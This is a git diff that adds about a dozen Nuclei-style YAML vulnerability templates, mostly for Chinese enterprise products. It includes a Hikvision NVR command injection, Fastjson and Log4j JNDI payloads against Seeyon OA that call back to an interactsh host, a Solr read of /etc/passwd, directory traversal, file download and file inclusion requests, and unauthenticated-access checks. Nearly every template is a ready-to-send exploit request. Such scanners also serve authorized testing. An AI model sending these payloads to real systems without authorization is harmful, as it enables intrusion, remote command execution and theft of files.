Str1am · Str1am · Aug 7, 2022
diff --git a/新增/frServer-listDir.yaml b/新增/frServer-listDir.yaml
@@ -0,0 +1,25 @@
+id: frServer-listDir
+
+info:
+  name: 帆软目录遍历漏洞
+  author: Str1am
+  severity: high
+  tags: frServer,listDir
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/WebReport/ReportServer?op=fs_remote_design&cmd=design_list_file&file_path=..&currentUserName=admin&currentUserId=1&isWebReport=true"
+      - "{{BaseURL}}/seeyonreport/ReportServer?op=fs_remote_design&cmd=design_list_file&file_path=..&currentUserName=admin&currentUserId=1&isWebReport=true"
+      - "{{BaseURL}}/ReportServer?op=fs_remote_design&cmd=design_list_file&file_path=..&currentUserName=admin&currentUserId=1&isWebReport=true"
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+      - type: word
+        words:
+          - "isDir"
+          - "envPath"
+        part: body
+        condition: and
diff --git a/新增/hivision_ip_rce.yaml b/新增/hivision_ip_rce.yaml
@@ -0,0 +1,23 @@
+id: hivision_NVR_RCE
+
+info:
+  name: 海康威视_NVR_IP摄像头
+  author: str1am
+  severity: critical
+  tags: hikvision,rce
+
+requests:
+  - raw:
+      - |
+        PUT /SDK/webLanguage HTTP/1.1
+        Host: {{Hostname}}
+        X-Requested-With: XMLHttpRequest
+        Content-Type: application/x-www-form-urlencoded
+
+        <?xml version='1.0' encoding='UTF-8'?><language>$(ls -l > webLib/x)</language>
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status: 
+          - 500
diff --git a/新增/nacos-unauth.yaml b/新增/nacos-unauth.yaml
@@ -0,0 +1,40 @@
+id: nacos-unauth
+
+info:
+  name: Nacos 1.x - Authentication Bypass
+  author: taielab,pikpikcu
+  severity: critical
+  description: "Nacos 1.x was discovered. A default Nacos instance needs to modify the application.properties configuration file or add the JVM startup variable Dnacos.core.auth.enabled=true to enable the authentication function (reference: https://nacos.io/en-us/docs/auth.html). But authentication can still be bypassed under certain circumstances and any interface can be called as in the following example that can add a new user (POST https://127.0.0.1:8848/nacos/v1/auth/users?username=test&password=test). That user can then log in to the console to access, modify, and add data."
+  reference:
+    - https://github.com/alibaba/nacos/issues/4593
+    - https://nacos.io/en-us/docs/auth.html
+  tags: nacos,unauth
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/nacos/v1/auth/users?pageNo=1&pageSize=9"
+      - "{{BaseURL}}/v1/auth/users?pageNo=1&pageSize=9"
+    headers:
+      User-Agent: Nacos-Server
+
+    matchers-condition: and
+    matchers:
+
+      - type: word
+        words:
+          - "Content-Type: application/json"
+        part: header
+
+      - type: regex
+        regex:
+          - '"username":'
+          - '"password":'
+        part: body
+        condition: and
+
+      - type: status
+        status:
+          - 200
+
+# Enhanced by mp on 2022/05/20
diff --git a/新增/pma_unauth.yaml b/新增/pma_unauth.yaml
@@ -0,0 +1,22 @@
+id: pma_unauth
+
+info:
+  name: pma未授权访问
+  author: str1am
+  severity: high
+  tags: pma
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/pma/setup/index.php"
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+      - type: word
+        words:
+          - "phpMyAdmin setup"
+        part: body
+        condition: and
diff --git a/新增/seeyon_fastjson.yaml b/新增/seeyon_fastjson.yaml
@@ -0,0 +1,33 @@
+id: seeyon_fastjson
+
+info:
+  name: 致远seeyon_fastjson漏洞
+  author: Str1am
+  severity: critical
+  tags: seeyon,seeyon_fastjson
+
+requests:
+  - raw:
+      - |
+        POST /seeyon/main.do?method=changeLocale HTTP/1.1
+        Host: {{Hostname}}
+        Content-Length: 79
+        Cache-Control: max-age=0
+        Upgrade-Insecure-Requests: 1
+        Content-Type: application/x-www-form-urlencoded
+        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
+        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+        Accept-Encoding: gzip, deflate
+        Accept-Language: zh-CN,zh;q=0.9,zh-TW;q=0.8,en-US;q=0.7,en;q=0.6
+        Cookie: JSESSIONID=5418C5A5511E3BC9806412DD8023386E; loginPageURL=""
+        Connection: close
+
+        _json_params={"a": {"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"b": {"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"{{interactsh-url}}","autoCommit":true}}
+
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: interactsh_protocol  # Confirms the DNS Interaction
+        words:
+          - "dns"
diff --git a/新增/seeyon_log4j.yaml b/新增/seeyon_log4j.yaml
@@ -0,0 +1,33 @@
+id: seeyon_log4j
+
+info:
+  name: 致远oa-log4j漏洞
+  author: Str1am
+  severity: critical
+  tags: seeyon,log4j
+
+requests:
+  - raw:
+      - |
+        GET /seeyon/index.jsp HTTP/1.1
+        Host: {{Hostname}}
+        Pragma: no-cache
+        Cache-Control: no-cache
+        Upgrade-Insecure-Requests: 1
+        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.0.0 Safari/537.36
+        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+        Accept-Encoding: gzip, deflate
+        Accept-Language: zh-CN,zh;q=0.9,zh-TW;q=0.8,en-US;q=0.7,en;q=0.6
+        Connection: close
+        X-Forwarded-For: ${jndi:dns://seeyon.{{interactsh-url}}/test}
+
+
+
+
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: interactsh_protocol  # Confirms the DNS Interaction
+        words:
+          - "dns"
diff --git a/新增/solr-fileRead.yaml b/新增/solr-fileRead.yaml
@@ -0,0 +1,33 @@
+id: solr-fileRead
+
+info:
+  name: solr 任意文件读取
+  author: Str1am
+  severity: high
+  tags: solr,fileRead
+
+requests:
+  - raw:
+      - |
+        POST /solr/supplierSearch_V2/debug/dump?param=ContentStreams HTTP/1.1
+        Host: {{Hostname}}
+        User-Agent: python-requests/2.26.0
+        Accept-Encoding: gzip, deflate
+        Accept: */*
+        Connection: keep-alive
+        Content-Length: 27
+        Content-Type: application/x-www-form-urlencoded
+
+        stream.file=%2Fetc%2Fpasswd
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+      - type: word
+        words:
+          - "root:x"
+          - "/bin/bash"
+        part: body
+        condition: and
diff --git a/新增/solr-rce.yaml b/新增/solr-rce.yaml
@@ -0,0 +1,24 @@
+id: solr-rce
+
+info:
+  name: solr命令执行
+  author: str1am
+  severity: high
+  tags: solr
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/solr/supplierSearch_V2/dataimport"
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+      - type: word
+        words:
+          - "responseHeader"
+          - "initArgs"
+          - "statusMessages"
+        part: body
+        condition: and
diff --git a/新增/swagger-ui.yaml b/新增/swagger-ui.yaml
@@ -0,0 +1,81 @@
+id: swagger-api
+
+info:
+  name: Public Swagger API
+  author: pdteam,c-sh0
+  severity: info
+  tags: exposure,api,swagger
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/swagger-ui/swagger-ui.js"
+      - "{{BaseURL}}/swagger/swagger-ui.js"
+      - "{{BaseURL}}/swagger-ui.js"
+      - "{{BaseURL}}/swagger/ui/swagger-ui.js"
+      - "{{BaseURL}}/swagger/ui/index"
+      - "{{BaseURL}}/swagger/index.html"
+      - "{{BaseURL}}/swagger-ui.html"
+      - "{{BaseURL}}/swagger/swagger-ui.html"
+      - "{{BaseURL}}/api/swagger-ui.html"
+      - "{{BaseURL}}/api-docs/swagger.json"
+      - "{{BaseURL}}/api-docs/swagger.yaml"
+      - "{{BaseURL}}/api_docs"
+      - "{{BaseURL}}/swagger.json"
+      - "{{BaseURL}}/swagger.yaml"
+      - "{{BaseURL}}/swagger/v1/swagger.json"
+      - "{{BaseURL}}/swagger/v1/swagger.yaml"
+      - "{{BaseURL}}/api/index.html"
+      - "{{BaseURL}}/api/docs/"
+      - "{{BaseURL}}/api/swagger.json"
+      - "{{BaseURL}}/api/swagger.yaml"
+      - "{{BaseURL}}/api/swagger.yml"
+      - "{{BaseURL}}/api/swagger/index.html"
+      - "{{BaseURL}}/api/swagger/swagger-ui.html"
+      - "{{BaseURL}}/api/api-docs/swagger.json"
+      - "{{BaseURL}}/api/api-docs/swagger.yaml"
+      - "{{BaseURL}}/api/swagger-ui/swagger.json"
+      - "{{BaseURL}}/api/swagger-ui/swagger.yaml"
+      - "{{BaseURL}}/api/apidocs/swagger.json"
+      - "{{BaseURL}}/api/apidocs/swagger.yaml"
+      - "{{BaseURL}}/api/swagger-ui/api-docs"
+      - "{{BaseURL}}/api/api-docs"
+      - "{{BaseURL}}/api/apidocs"
+      - "{{BaseURL}}/api/swagger"
+      - "{{BaseURL}}/api/swagger/static/index.html"
+      - "{{BaseURL}}/api/swagger-resources"
+      - "{{BaseURL}}/api/swagger-resources/restservices/v2/api-docs"
+      - "{{BaseURL}}/api/__swagger__/"
+      - "{{BaseURL}}/api/_swagger_/"
+      - "{{BaseURL}}/api/spec/swagger.json"
+      - "{{BaseURL}}/api/spec/swagger.yaml"
+      - "{{BaseURL}}/api/swagger/ui/index"
+      - "{{BaseURL}}/__swagger__/"
+      - "{{BaseURL}}/_swagger_/"
+      - "{{BaseURL}}/api/v1/swagger-ui/swagger.json"
+      - "{{BaseURL}}/api/v1/swagger-ui/swagger.yaml"
+      - "{{BaseURL}}/swagger-resources/restservices/v2/api-docs"
+      - "{{BaseURL}}/api/swagger_doc.json"
+
+    stop-at-first-match: true
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "swagger:"
+          - "Swagger 2.0"
+          - "\"swagger\":"
+          - "Swagger UI"
+          - "**token**:"
+        condition: or
+
+      - type: status
+        status:
+          - 200
+
+    extractors:
+      - type: regex
+        part: body
+        group: 1
+        regex:
+          - " @version (v[0-9]{1,3}.[0-9]{1,3}.[0-9]{1,3})"
diff --git a/新增/sxf-filedownload.yaml b/新增/sxf-filedownload.yaml
@@ -0,0 +1,22 @@
+id: sxf-filedownload
+
+info:
+  name: 深信服文件下载
+  author: Str1am
+  severity: high
+  tags: solr
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/QH.aspx?responderId=ResourceNewResponder&action=download&fileName=.%2fGlobal.asax"
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+      - type: word
+        words:
+          - "QiHang.Media.Web.Global"
+        part: body
+        condition: and
diff --git a/新增/thinkCMF_include.yaml b/新增/thinkCMF_include.yaml
@@ -0,0 +1,22 @@
+id: thinkCMF_include
+
+info:
+  name: thinkCMF文件包含漏洞
+  author: str1am
+  severity: high
+  tags: pma
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/index.php?a=display&templateFile=README.md"
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+      - type: word
+        words:
+          - "官网:http://www.thinkcmf.com"
+        part: body
+        condition: and
diff --git a/新增/tongda_sqli2022.yaml b/新增/tongda_sqli2022.yaml
@@ -0,0 +1,17 @@
+id: tongda_sqli2022
+
+info:
+  name: 通达oa sql注入
+  author: Str1am
+  severity: high
+  tags: tongda,sqli
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/general/management_center/portal/oa_engine/engine_manage_bulletin_number/query.php"
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200